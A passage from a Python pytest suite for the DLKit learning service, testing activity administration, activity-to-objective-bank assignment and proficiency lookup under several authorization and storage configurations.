request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def activity_admin_session_test_fixture(request):
pass
@pytest.mark.usefixtures("activity_admin_session_class_fixture", "activity_admin_session_test_fixture")
class TestActivityAdminSession(object):
"""Tests for ActivityAdminSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_create_activities(self):
"""Tests can_create_activities"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resources_template
assert isinstance(self.catalog.can_create_activities(), bool)
def test_can_create_activity_with_record_types(self):
"""Tests can_create_activity_with_record_types"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resource_with_record_types_template
assert isinstance(self.catalog.can_create_activity_with_record_types(DEFAULT_TYPE), bool)
def test_get_activity_form_for_create(self):
"""Tests get_activity_form_for_create"""
# From test_templates/learning.py::ActivityAdminSession::get_activity_form_for_create_template
if not is_never_authz(self.service_config):
form = self.catalog.get_activity_form_for_create(self.parent_object.ident, [])
assert isinstance(form, OsidForm)
assert not form.is_for_update()
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activity_form_for_create(self.fake_id, [])
def test_create_activity(self):
"""Tests create_activity"""
# From test_templates/resource.py::ResourceAdminSession::create_resource_template
from dlkit.abstract_osid.learning.objects import Activity
if not is_never_authz(self.service_config):
assert isinstance(self.osid_object, Activity)
assert self.osid_object.display_name.text == 'new Activity'
assert self.osid_object.description.text == 'description of Activity'
assert self.osid_object.genus_type == NEW_TYPE
with pytest.raises(errors.IllegalState):
self.catalog.create_activity(self.form)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_activity('I Will Break You!')
update_form = self.catalog.get_activity_form_for_update(self.osid_object.ident)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_activity(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.create_activity('foo')
def test_can_update_activities(self):
"""Tests can_update_activities"""
# From test_templates/resource.py::ResourceAdminSession::can_update_resources_template
assert isinstance(self.catalog.can_update_activities(), bool)
def test_get_activity_form_for_update(self):
"""Tests get_activity_form_for_update"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_update_template
if not is_never_authz(self.service_config):
form = self.catalog.get_activity_form_for_update(self.osid_object.ident)
assert isinstance(form, OsidForm)
assert form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_activity_form_for_update(['This is Doomed!'])
with pytest.raises(errors.InvalidArgument):
self.catalog.get_activity_form_for_update(
Id(authority='Respect my Authoritay!',
namespace='learning.{object_name}',
identifier='1'))
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_activity_form_for_update(self.fake_id)
def test_update_activity(self):
"""Tests update_activity"""
# From test_templates/resource.py::ResourceAdminSession::update_resource_template
if not is_never_authz(self.service_config):
from dlkit.abstract_osid.learning.objects import Activity
form = self.catalog.get_activity_form_for_update(self.osid_object.ident)
form.display_name = 'new name'
form.description = 'new description'
form.set_genus_type(NEW_TYPE_2)
updated_object = self.catalog.update_activity(form)
assert isinstance(updated_object, Activity)
assert updated_object.ident == self.osid_object.ident
assert updated_object.display_name.text == 'new name'
assert updated_object.description.text == 'new description'
assert updated_object.genus_type == NEW_TYPE_2
with pytest.raises(errors.IllegalState):
self.catalog.update_activity(form)
with pytest.raises(errors.InvalidArgument):
self.catalog.update_activity('I Will Break You!')
with pytest.raises(errors.InvalidArgument):
self.catalog.update_activity(self.form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.update_activity('foo')
def test_can_delete_activities(self):
"""Tests can_delete_activities"""
# From test_templates/resource.py::ResourceAdminSession::can_delete_resources_template
assert isinstance(self.catalog.can_delete_activities(), bool)
def test_delete_activity(self):
"""Tests delete_activity"""
if not is_never_authz(self.service_config):
form = self.catalog.get_activity_form_for_create(self.parent_object.ident, [])
form.display_name = 'new Activity'
form.description = 'description of Activity'
form.set_genus_type(NEW_TYPE)
osid_object = self.catalog.create_activity(form)
self.catalog.delete_activity(osid_object.ident)
with pytest.raises(errors.NotFound):
self.catalog.get_activity(osid_object.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.delete_activity(self.fake_id)
def test_can_manage_activity_aliases(self):
"""Tests can_manage_activity_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.catalog.can_manage_activity_aliases(), bool)
def test_alias_activity(self):
"""Tests alias_activity"""
# From test_templates/resource.py::ResourceAdminSession::alias_resource_template
if not is_never_authz(self.service_config):
alias_id = Id(self.catalog.ident.namespace + '%3Amy-alias%40ODL.MIT.EDU')
self.catalog.alias_activity(self.osid_object.ident, alias_id)
aliased_object = self.catalog.get_activity(alias_id)
assert aliased_object.ident == self.osid_object.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.alias_activity(self.fake_id, self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_objective_bank_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.activity_list = list()
request.cls.activity_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for ActivIty Lookup'
create_form.description = 'Test Objective for ActivityLookupSession tests'
request.cls.objective = request.cls.catalog.create_objective(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityObjectiveBankSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
request.cls.svc_mgr.assign_activity_to_objective_bank(
request.cls.activity_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.assign_activity_to_objective_bank(
request.cls.activity_ids[2], request.cls.assigned_catalog.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.unassign_activity_from_objective_bank(
request.cls.activity_ids[1], request.cls.assigned_catalog.ident)
request.cls.svc_mgr.unassign_activity_from_objective_bank(
request.cls.activity_ids[2], request.cls.assigned_catalog.ident)
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_activities():
catalog.delete_activity(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def activity_objective_bank_session_test_fixture(request):
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("activity_objective_bank_session_class_fixture", "activity_objective_bank_session_test_fixture")
class TestActivityObjectiveBankSession(object):
"""Tests for ActivityObjectiveBankSession"""
def test_can_lookup_activity_objective_bank_mappings(self):
"""Tests can_lookup_activity_objective_bank_mappings"""
# From test_templates/resource.py::ResourceBinSession::can_lookup_resource_bin_mappings
result = self.session.can_lookup_activity_objective_bank_mappings()
assert isinstance(result, bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_activity_ids_by_objective_bank(self):
"""Tests get_activity_ids_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bin_template
if not is_never_authz(self.service_config):
objects = self.svc_mgr.get_activity_ids_by_objective_bank(self.assigned_catalog.ident)
assert objects.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_activity_ids_by_objective_bank(self.fake_id)
def test_get_activities_by_objective_bank(self):
"""Tests get_activities_by_objective_bank"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bin_template
if not is_never_authz(self.service_config):
results = self.session.get_activities_by_objective_bank(self.assigned_catalog.ident)
assert isinstance(results, ABCObjects.ActivityList)
assert results.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_by_objective_bank(self.fake_id)
def test_get_activity_ids_by_objective_banks(self):
"""Tests get_activity_ids_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resource_ids_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
object_ids = self.session.get_activity_ids_by_objective_banks(catalog_ids)
assert isinstance(object_ids, IdList)
# Currently our impl does not remove duplicate objectIds
assert object_ids.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activity_ids_by_objective_banks([self.fake_id])
def test_get_activities_by_objective_banks(self):
"""Tests get_activities_by_objective_banks"""
# From test_templates/resource.py::ResourceBinSession::get_resources_by_bins_template
if not is_never_authz(self.service_config):
catalog_ids = [self.catalog.ident, self.assigned_catalog.ident]
results = self.session.get_activities_by_objective_banks(catalog_ids)
assert isinstance(results, ABCObjects.ActivityList)
# Currently our impl does not remove duplicate objects
assert results.available() == 5
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_activities_by_objective_banks([self.fake_id])
def test_get_objective_bank_ids_by_activity(self):
"""Tests get_objective_bank_ids_by_activity"""
# From test_templates/resource.py::ResourceBinSession::get_bin_ids_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_bank_ids_by_activity(self.activity_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_ids_by_activity(self.fake_id)
def test_get_objective_banks_by_activity(self):
"""Tests get_objective_banks_by_activity"""
# From test_templates/resource.py::ResourceBinSession::get_bins_by_resource_template
if not is_never_authz(self.service_config):
cats = self.svc_mgr.get_objective_banks_by_activity(self.activity_ids[1])
assert cats.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_activity(self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def activity_objective_bank_assignment_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.activity_list = list()
request.cls.activity_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ActivityObjectiveBankAssignmentSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Assignment'
create_form.description = 'Test Objective for ActivityObjectiveBankAssignmentSession tests assignment'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_activity_form_for_create(request.cls.objective.ident, [])
create_form.display_name = 'Test Activity ' + str(num)
create_form.description = 'Test Activity for ActivityObjectiveBankAssignmentSession tests'
obj = request.cls.catalog.create_activity(create_form)
request.cls.activity_list.append(obj)
request.cls.activity_ids.append(obj.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_activities():
request.cls.catalog.delete_activity(obj.ident)
for obj in request.cls.catalog.get_objectives():
request.cls.catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def activity_objective_bank_assignment_session_test_fixture(request):
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("activity_objective_bank_assignment_session_class_fixture", "activity_objective_bank_assignment_session_test_fixture")
class TestActivityObjectiveBankAssignmentSession(object):
"""Tests for ActivityObjectiveBankAssignmentSession"""
def test_can_assign_activities(self):
"""Tests can_assign_activities"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_template
result = self.session.can_assign_activities()
assert isinstance(result, bool)
def test_can_assign_activities_to_objective_bank(self):
"""Tests can_assign_activities_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_to_bin_template
result = self.session.can_assign_activities_to_objective_bank(self.assigned_catalog.ident)
assert isinstance(result, bool)
def test_get_assignable_objective_bank_ids(self):
"""Tests get_assignable_objective_bank_ids"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy.
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids(self.catalog.ident)
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids(self.fake_id)
def test_get_assignable_objective_bank_ids_for_activity(self):
"""Tests get_assignable_objective_bank_ids_for_activity"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_for_resource_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy.
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids_for_activity(self.catalog.ident, self.activity_ids[0])
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids_for_activity(self.fake_id, self.fake_id)
def test_assign_activity_to_objective_bank(self):
"""Tests assign_activity_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::assign_resource_to_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_activities()
assert results.available() == 0
self.session.assign_activity_to_objective_bank(self.activity_ids[1], self.assigned_catalog.ident)
results = self.assigned_catalog.get_activities()
assert results.available() == 1
self.session.unassign_activity_from_objective_bank(
self.activity_ids[1],
self.assigned_catalog.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.assign_activity_to_objective_bank(self.fake_id, self.fake_id)
def test_unassign_activity_from_objective_bank(self):
"""Tests unassign_activity_from_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::unassign_resource_from_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_activities()
assert results.available() == 0
self.session.assign_activity_to_objective_bank(
self.activity_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_activities()
assert results.available() == 1
self.session.unassign_activity_from_objective_bank(
self.activity_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_activities()
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.unassign_activity_from_objective_bank(self.fake_id, self.fake_id)
def test_reassign_activity_to_objective_bank(self):
"""Tests reassign_activity_to_objective_bank"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.reassign_activity_to_objective_bank(True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_lookup_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3A000000000000000000000000%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def proficiency_lookup_session_test_fixture(request):
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyLookupSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
form = request.cls.catalog.get_objective_form_for_create([])
form.display_name = "Test LO"
objective = request.cls.catalog.create_objective(form)
for color in ['Orange', 'Blue']:
create_form = request.cls.catalog.get_proficiency_form_for_create(objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + color
create_form.description = (
'Test Proficiency for ProficiencyLookupSession tests, did I mention green')
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_proficiency_lookup_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_proficiencies():
catalog.delete_proficiency(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("proficiency_lookup_session_class_fixture", "proficiency_lookup_session_test_fixture")
class TestProficiencyLookupSession(object):
"""Tests for ProficiencyLookupSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_lookup_proficiencies(self):
"""Tests can_lookup_proficiencies"""
# From test_templates/resource.py ResourceLookupSession.can_lookup_resources_template
assert isinstance(self.catalog.can_lookup_proficiencies(), bool)
def test_use_comparative_proficiency_view(self):
"""Tests use_comparative_proficiency_view"""
# From test_templates/resource.py ResourceLookupSession.use_comparative_resource_view_template
self.catalog.use_comparative_proficiency_view()
def test_use_plenary_proficiency_view(self):
"""Tests use_plenary_proficiency_view"""
# From test_templates/resource.py ResourceLookupSession.use_plenary_resource_view_template
self.catalog.use_plenary_proficiency_view()
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_use_effective_proficiency_view(self):
"""Tests use_effective_proficiency_view"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.use_effective_proficiency_view()
def test_use_any_effective_proficiency_view(self):
"""Tests use_any_effective_proficiency_view"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.use_any_effective_proficiency_view()
def test_get_proficiency(self):
"""Tests get_proficiency"""
# From test_templates/resource.py ResourceLookupSession.get_resource_template
if self.svc_mgr.supports_proficiency_query():
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
else:
with pytest.raises(errors.NotFound):
self.catalog.get_proficiency(self.fake_id)
else:
if not is_never_authz(self.service_config):
self.catalog.use_isolated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
self.catalog.use_federated_objective_bank_view()
obj = self.catalog.get_proficiency(self.proficiency_list[0].ident)
assert obj.ident == self.proficiency_list[0].ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiency(self.fake_id)
def test_get_proficiencies_by_ids(self):
"""Tests get_proficiencies_by_ids"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_ids_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert isinstance(objects, ProficiencyList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
assert objects.available() > 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_ids(self.proficiency_ids)
def test_get_proficiencies_by_genus_type(self):
"""Tests get_proficiencies_by_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_genus_type_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() > 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_genus_type(DEFAULT_GENUS_TYPE)
def test_get_proficiencies_by_parent_genus_type(self):
"""Tests get_proficiencies_by_parent_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_parent_genus_type_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.Unimplemented):
# because the never_authz "tries harder" and runs the actual query...
# whereas above the method itself in JSON returns an empty list
self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
def test_get_proficiencies_by_record_type(self):
"""Tests get_proficiencies_by_record_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_record_type_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
def test_get_proficiencies_on_date(self):
"""Tests get_proficiencies_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_on_date(True, True)
def test_get_proficiencies_by_genus_type_on_date(self):
"""Tests get_proficiencies_by_genus_type_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_on_date(True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_objective(self):
"""Tests get_proficiencies_for_objective"""
pass
def test_get_proficiencies_for_objective_on_date(self):
"""Tests get_proficiencies_for_objective_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_for_objective_on_date(True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_by_genus_type_for_objective(self):
"""Tests get_proficiencies_by_genus_type_for_objective"""
pass
def test_get_proficiencies_by_genus_type_for_objective_on_date(self):
"""Tests get_proficiencies_by_genus_type_for_objective_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_for_objective_on_date(True, True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_objectives(self):
"""Tests get_proficiencies_for_objectives"""
pass
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_resource(self):
"""Tests get_proficiencies_for_resource"""
pass
def test_get_proficiencies_for_resource_on_date(self):
"""Tests get_proficiencies_for_resource_on_date"""
# From test_templates/relationship.py::RelationshipLookupSession::get_relationships_for_source_on_date_template
if not is_never_authz(self.service_config):
end_date = DateTime.utcnow() + datetime.timedelta(days=5)
end_date = DateTime(**{
'year': end_date.year,
'month': end_date.month,
'day': end_date.day,
'hour': end_date.hour,
'minute': end_date.minute,
'second': end_date.second,
'microsecond': end_date.microsecond
})
# NOTE: this first argument will probably break in many of the other methods,
# since it's not clear they always use something like AGENT_ID
# i.e. in get_grade_entries_for_gradebook_column_on_date it needs to be
# a gradebookColumnId.
results = self.session.get_proficiencies_for_resource_on_date(AGENT_ID, DateTime.utcnow(), end_date)
assert isinstance(results, ABCObjects.ProficiencyList)
assert results.available() == 2
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_by_genus_type_for_resource(self):
"""Tests get_proficiencies_by_genus_type_for_resource"""
pass
def test_get_proficiencies_by_genus_type_for_resource_on_date(self):
"""Tests get_proficiencies_by_genus_type_for_resource_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_for_resource_on_date(True, True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_resources(self):
"""Tests get_proficiencies_for_resources"""
pass
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_objective_and_resource(self):
"""Tests get_proficiencies_for_objective_and_resource"""
pass
def test_get_proficiencies_for_objective_and_resource_on_date(self):
"""Tests get_proficiencies_for_objective_and_resource_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
